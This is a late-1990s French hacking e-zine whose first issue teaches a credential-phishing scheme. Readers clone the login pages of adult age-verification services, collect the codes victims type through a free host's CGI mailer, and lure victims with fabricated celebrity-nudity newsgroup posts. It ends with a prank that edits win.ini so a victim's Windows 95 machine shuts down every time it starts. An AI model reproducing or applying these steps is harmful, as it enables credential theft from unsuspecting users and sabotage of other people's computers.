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« Everything the light touches is our kingdom»








Vous avez sous les yeux le tout premier exemplaire de "La chronique de Saturnin", un e-zine sur le hacking.


Vous ne savez pas ce qu'est le hacking ?! Désolé, je ne peut rien faire pour vous, allez donc faire un tour du côté de http://www.jesuisledernierdescons.fr





Qui est Saturnin ?





Un internaute de base, qui passe une à deux heures pas jour sur internet, ce n'est pas un génie, juste quelqu'un de simple, humble, qui met ses connaissances aux services de tous. Mais c'est aussi un canard.





Dans ce numéro :





Obtenir des codes pour acceder à des MILLIERS de sites X





Aucun code n'est donné ici, par ailleurs l'auteur dément formellement avoir un jour utilisé cette technique pour se procurer un code. Cette technique n'est donné que pour évaluation. 


  


Pré-requis :


	


	- un site sur Mygale 


	- des connaissances de base en HTML





Mais pourquoi sur Mygale ? : Simplement parce que vous devez avoir un site WEB pour la méthde qui suit et surtout parce que ce fournisseur d'espace (Gratuit !) possède un programme en /cgi-bin/ qui permet de créer des formulaires et de les recevoirs par e-mail.


Si on avait utilisé la technique du <FORM METHOD="POST" ACTION="mailto:email@xxx.fr">, le navigateur aurait affiché un message de ce type "This form is submitted via e-mail, bla bla bla ...." avant d'envoyer le mot de passe. En utilisant le programme mailer de Mygale, on évite ce problème puisque dès que la "victime" a tapé sur SUBMIT (ou ENVOYER ou un truc du même genre) c'est trop tard pour annuler, même si la personne se rend compte qu'elle vient de se faire avoir.





Ne me dites pas que vous n'avez jamais essayé de trouver un code d'accès ADULTCHECK, PORNOPASS ou autre pour rentrer dans un site au contenu érotique, voire vraiment porno, vous vous y êtes surement cassé les dents, c'est normal, le passage en force ne fonctionne presque jamais.


Faisons plutôt preuve de diplomatie, comment vous procurer un code ?


Primo, il faut qu'il existe (plutôt logique), et qui possède un code qui existe et qui fonctionne ?


Réponse : une personne qui posséde un code qui existe et qui fonctionne ! He, He, He, on n'avance pas beaucoup, mais patience, j'y arrive.


Bref, il existe quelque part dans le monde de nombreuses personnes possedant le code que vous voulez (ou plutôt un login qui permet l'accès au(x) site(s)), vous pouvez toujour supplier pour qu'on vous le donne en envoyant des posts dans les newsgroups, votre pourcentage de chance de vous procurer ce code est d'environ 0,1% contre 70% à 100% pour ma technique (selon le code désiré).





Donc, pour avoir un code d'accès, il va falloir le voler ! Vous ne comprenez peut-être pas, mais c'est simple pourtant, bien sur, vous n'allez pas vous rendre chez la personne pour le lui prendre ! C'est la personne elle-même qui va vous le donner (sans le savoir).


Le but de la manoeuvre est de faire croire au visiteur que le code qu'il tape va aller au site mère de l'AVS pour vérification. Mais en fait, l'interface est bidon, il suffit de recréer l'interface comme par exemple dans le fichier ACCESS.HTML contenu dans le répertoire ADULTCHECK. Ce fichier recréé l'interface d'accès de ADULTCHECK, mais vous pouvez recréer par vous même d'autres interfaces (pensez à m'en envoyer une copie, merci).





Celà fonctionne comme pour un formulaire chez Mygale, le quidam tape son code dans un zone de texte (voir l'exemple ACCESS.HTML), cette zone de texte est envoyée au programme mailer (à /Cgi-bin/mailer) qui vous le renvoie par e-mail. 





4 exemples sont fournis dans cette archive : 





ADULTCHECK (2 fichiers .html)


ADULTCHECK GOLD (2 fichiers .html + 6 fichiers .gif)


ADULTPASS (2 fichiers .html + 1 fichier .gif)


AGECHECK (2 fichier .html + 2 fichiers .gif)





Prenont le cas de ADULTCHECK qui se compose de 2 fichiers HTML, ACCESS.HTML et ERROR.HTM, vous devez remplacer les jojo@mygale.org par votre_email@mygale.org et ~jojo/error.htm par votre URL (exemple : 04/danny/error.htm ou ~danny/error.htm). Le fichier ACCESS.HTML concerne ADULTCHECK qui permet l'accès à plus de 35000 sites X, sachez que c'est le plus répendu des AVS et que votre pourcentage de réussite est de 100%, en clair : en une journée vous recevrez UNE DIZAINE DE CODES (et même plus) !!!


Le fichier ERROR.HTM sert à faire croire au visiteur que le site est "DOWN", qu'il est HS. Ce n'est qu'un fichier qui contient une ligne de texte et sur lequel la "victime" sera réorientée.





note : Pour créer d'autres interfaces (si vous voulez PORNOPASS par exemple), vous devez aller sur un site protégé et enregistrer la page où on vous demande votre login (fichiers .html et fichiers .gif et .jpg). Prenez exemple sur les interfaces fournies pour ajouter les commandes qui vous serviront à recevoir des passwords. Cela requiert quelques connaissances en html.





Bref une fois que vous avez effectué les modifications ci-dessus, vous devez uploader les 2 fichiers sur votre site Mygale (avec votre client FTP vous vous connectez à ftp.mygale.org avec votre login/password) , je vous conseille de faire un test en allant sur la page ACCESS.HTML et en tapant n'importe quoi comme login, logiquement, vous devez être renvoyé sur un message d'erreur (le fichier ERROR.HTM) puis quelques minutes plus tard, de verifier votre courrier , si vous recevez le code que vous venez de taper, c'est bon.





Il ne reste plus qu'à attirer des visiteurs possédant le login tant désiré. La solution la plus simple et la plus rapide et celle des posts dans les newsgroups. 


Il est préférable de maitriser l'Anglais (ou plutôt l'américain !) pour bien cibler. 





Exemple de post (pour obtenir un AdultCheck AVS) dans un alt.sex : 


(N'écrivez que le texte en rose) 





Sujet : !!! Sexy Celebs NAKED (AdultCheck Required) 


Texte : Hundred of Sexy Celebs NAKED : 


 - Sandra Bullock !!!  (même si c'est une énorme connerie, que c'est impossible, ça attire un max de monde !) 


- Alicia Silverstone TOTALLY NAKED (elle est vachement à la mode en ce moment) 


- Sarah Michelle GELAR !!! Her porn movie !!


- Ronaldo's Girlfriend ASSFUCK (la j'exagère, mais bon, on s'en fout) 





Extrapolez, inventez, le plus invraissemblable attire le plus de monde, envoyez votre post dans un max de newsgroups (une dizaine de ALT.SEX.***) 





Mais tous les mots de passe que vous recevrez ne sont pas obligatoirement bons, vous en recevrez un bon paquet de bidons, mais ça c'est tous les lamerz qui essayent de taper un code au hasard en croyant que ça marchera :-)





Vous voulez m'envoyez les interfaces que vous avez créé (en .ZIP SVP) ou juste m'écire :  Saturnin@Bigfoot.com








-=-=-=-=-=-=-=-=-=-=-








Voilà, c'est fini pour aujourd'hui, mais avant de vous quitter, je vais vous donner une petite astuce pour emmerder les lamerz de votre entourage (sous Win95 et +)





Créez un raccourci dans le repertoire de windows (donnez lui un nom quelconque comme fuckyou) :


ligne de commande du raccourci : rundll32.exe user.exe,exitwindows


Editez le fichier win.ini :


Modifiez la ligne run=fuckyou (le nom du raccourci)


Enregistrez, quittez, et fouttez le camp avant qu'il se rende compte de ce qui lui arrive, il y a 90% de chance que ce crétin réinstalle tout windows.








Allez à p'luche !


